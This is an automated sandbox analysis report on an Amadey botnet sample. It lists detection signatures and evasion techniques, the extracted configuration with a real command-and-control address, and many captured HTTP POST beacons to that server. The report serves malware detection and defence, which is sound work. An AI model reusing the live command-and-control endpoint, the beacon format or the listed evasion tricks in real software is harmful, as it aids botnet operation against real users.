Windows Analysis Report
msqT9atzYW.exe

Overview

General Information

Sample name: msqT9atzYW.exe
renamed because original name is a hash value
Original sample name: b2f874f58722f67061a01726f43ce570.exe
Analysis ID: 1540828
MD5: b2f874f58722f67061a01726f43ce570
SHA1: 87572c77ec7d2ae7385f5855b337d2ddb530cb01
SHA256: 4feae1ea40a074d042ba08876d3c459dddcefc9d4eaad6a5a0709dd482e899df
Tags: Amadeyexeuser-abuse_ch
Infos:

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: msqT9atzYW.exe Avira: detected
Antivirus detection for URL or domain
Source: http://185.215.113.43/Zu7JuNko/index.php URL Reputation: Label: phishing
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Found malware configuration
Source: 00000003.00000003.2271001764.0000000005790000.00000004.00001000.00020000.00000000.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Multi AV Scanner detection for domain / URL
Source: http://185.215.113.43/Zu7JuNko/index.phpj Virustotal: Detection: 12% Perma Link
Source: http://185.215.113.43/Zu7JuNko/index.phpF Virustotal: Detection: 12% Perma Link
Source: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp Virustotal: Detection: 12% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 57%
Multi AV Scanner detection for submitted file
Source: msqT9atzYW.exe ReversingLabs: Detection: 57%
Source: msqT9atzYW.exe Virustotal: Detection: 52% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: msqT9atzYW.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: msqT9atzYW.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49999 -> 185.215.113.43:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 185.215.113.43
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 37 32 45 37 36 42 31 35 31 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A76B72E76B15182D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.43 185.215.113.43
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.43
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F6BE30 Sleep,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 7_2_00F6BE30
Source: unknown HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php-
Source: skotes.exe, 00000007.00000002.3479317358.000000000163F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7n
Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpN
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpj
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded_9
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpt9
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNm

System Summary
barindex
PE file contains section with special chars
Source: msqT9atzYW.exe Static PE information: section name:
Source: msqT9atzYW.exe Static PE information: section name: .idata
Source: msqT9atzYW.exe Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name:
Creates files inside the system directory
Source: C:\Users\user\Desktop\msqT9atzYW.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00FA78BB 7_2_00FA78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00FA8860 7_2_00FA8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00FA7049 7_2_00FA7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F64DE0 7_2_00F64DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00FA31A8 7_2_00FA31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00F6E530 7_2_00F6E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00FA2D10 7_2_00FA2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 7_2_00FA779B 7_2_00FA779B
